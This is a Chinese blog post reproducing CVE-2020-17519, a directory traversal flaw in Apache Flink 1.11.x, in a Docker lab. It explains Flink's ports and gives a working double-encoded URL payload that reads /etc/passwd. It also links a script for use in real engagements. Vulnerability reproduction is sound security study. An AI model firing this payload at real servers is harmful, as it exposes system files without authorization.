首页 > 其他分享 >12

12

时间:2023-08-15 12:03:09浏览次数:37  
标签:12 8081 ..% Flink 端口 252f Apache

Apache Flink目录遍历漏洞复现CVE-2020-17519

前置知识

Apache Flink:

Apache Flink 是一个框架和分布式处理引擎,用于在无边界和有边界数据流上进行有状态的计算。Flink 能在所有常见集群环境中运行,并能以内存速度和任意规模进行计算。

漏洞利用条件:

Apache Flink版本为1.11.0或者1.11.1或者1.11.2

漏洞利用payload:

http://192.168.40.148:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%
252f..%252f..%252f..%252fetc%252fpasswd

靶场搭建

find ./ -name *CVE-2020*
docker-compose up -d
docker ps  # 查看端口

image-20230815011206514

image-20230815011846642

得知两个端口:6123 和 8081

两个端口有什么作用?
Apache Flink的6123端口用于Flink的远程通信和管理,主要用于与 Flink 集群中的 JobManager 通信

JobManager 是 Flink 集群的主要协调节点,负责接收和调度提交的作业(jobs),管理任务的调度和执行,并提供了 REST
接口供用户和外部系统与 Flink 集群进行交互。

通过 6123 端口,您可以使用 Flink 的 REST API 与 Flink 集群进行交互,例如提交作业、查询作业状态、获取作业详情
等操作。这是与 Flink 集群进行远程管理和监控的入口之一。

Apache Flink的8081端口用于Flink的Web UI界面的和REST接口

Flink 的 Web UI 提供了一个用户界面,允许您监控和管理正在执行
的作业、任务、JobManager 和 TaskManager 的状态等。此外,8081 端口还提供了 Flink 的 REST API,允许您通过
HTTP 请求与 Flink 集群进行交互,例如提交作业、查询作业状态、获取作业计数等。

本次打的是提供UI的端口,即8081端口

漏洞利用

访问8081端口:

image-20230815012016962

既然是目录遍历,那就直接上payload:

http://192.168.40.148:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%
252f..%252f..%252f..%252fetc%252fpasswd

image-20230815012812036

成功读取文件

实战中可使用脚本:https://wwwg.lanzouk.com/iD5Q315em7gb

使用效果:

image-20230815014006798

标签:12,8081,..%,Flink,端口,252f,Apache
From: https://www.cnblogs.com/hello-admin/p/17630983.html

相关文章

  • 酷睿i7 13700hx和i7 12700h选哪个 i713700hx和12700h对比
    i713700hx采用10nm工艺16个核和24个线程,基本的频率为2.1GHZ,甚至可以提升到4.96ghz。三级缓存55MB热设计功耗(TDP)55W支持最大内存128GB内存类型DDR43200MHzDDR54800MHz集成显卡IntelUHDGraphics选i713700hx还是i712700h这些点很重要http://www.adiannao.cn/dyi7-1......
  • 达人评测i9 13900h和i5 12500h选哪个好 i913900h和i512500h对比
    i913900h采用10纳米制作工艺最高睿频5.4GHz十四核心二十线程三级缓存36MB热设计功耗(TDP)115W支持最大内存64GB内存类型DDR43200MHzDDR55200MHz集成显卡IntelIrisXeGraphics笔记本cpu选i512500H还是i913900H这些点很重要看过你就懂了 http://www.adiannao.cn......
  • 达人评测 i9 13900H 和i7 12700h差多少 酷睿i913900H 和i712700h对比
    i913900h采用10纳米制作工艺最高睿频5.4GHz十四核心二十线程三级缓存36MB热设计功耗(TDP)115W支持最大内存64GB内存类型DDR43200MHzDDR55200MHz集成显卡IntelIrisXeGraphics选i913900h和i712700h这些点很重要看过你就懂了 http://www.adiannao.cn/dyi7-12700H......
  • 已知两个128维向量,向量格式为list,计算两个向量的余弦相似性
    计算两个向量的余弦相似度可以使用以下公式:余弦相似度=(向量A·向量B)/(||向量A||*||向量B||)其中,向量A·向量B表示向量A和向量B的点积(内积),||向量A||和||向量B||表示向量A和向量B的欧几里德范数(模)。下面是一个示例代码,展示如何计算两个128维向量的余弦相似度:imp......
  • P4412 题解
    P4412题解传送门更好的阅读体验简化题意:一张无向图,给定一棵生成树,求最小的修改边权的代价使得这棵生成树是最小生成树,代价定义为修改前后一条边的边权变化量的绝对值。思路首先,发现让这棵树成为最小生成树不好直接处理,但是判定是否为最小生成树却相对更容易。判定的思路......
  • 2023.08.12 codeforces round 892 div2
    年轻人的第三场div2(已完成:ABCDE)rank:1265solved:4ratingchange:+276newrating:1323A.UnitedWeStand题意:给定一个数列a,问是否能分成两个非空的数列b和c,使得c中任意一个数不是b中任意一个数的因子;若x是y的因子则有x<=y;因此不妨将数列的最大值放入c,把剩下的数放入b;注意数列中......
  • [ARC126C] Maximize GCD 题解
    题意给定一个序列\(A\),每次操作可以使\(A_i+1\)(\(i\in\left[1,n\right]\),\(K\)次操作的\(i\)可以不同),最多可以做\(K\)次。问\(\gcd{A_1,A_2,...,A_n}\)的最大值。题解首先,如果\(K\)可以把当前序列中所有的数都加到\(A_{\max}\),那就全部加到\(A_{\max}\),在......
  • [ARC126D] Pure Straight 题解
    题意给定一个有\(N\)个正整数的序列\(A=(A_1,A_2,\cdots,A_N)\),且\(A_i\in\left[1,K\right]\)。你可以对这个序列做如下操作若干次。交换两个相邻的元素,也就是选出\(i\)和\(j\)满足\(\lverti-j\rvert=1\)并交换\(A_i\)和\(A_j\)。找到最小的操作数使\(......
  • FP6296内置MOS异步DC升压芯片,单双节锂电池输入,最高12V输出
    FP6296是一颗电流控制模式升压转换器,脉波宽度调变(PWM),内置15mΩ/10A/14VMOSFET,能做大功率高转换效率,周边元件少节省空间,适合用在行动装置,宽工作电压2.7V~12V,单节与双节锂电池都能使用,精准反馈电压1.2V(±2%),过电流保护透过外部电阻调整,电流控制模式让暂态响应与系统稳定性佳,轻载......
  • 锐龙r7 6800u和酷睿i7 1280p差距 r76800u和i71280p对比
    aMD锐龙76800U处理器,采用全新的Zen3+架构,6nm制程工艺,8大核16线程,最大加速时钟频率可达4.7GHz,三级缓存16MB。锐龙76800U处理器核显为AMDRadeon680M显卡,RDNA2架构,12显示核心,2200MHz显示频率,相较于前代显示性能提升约2倍选r76800u还是i71280p这些点很重要......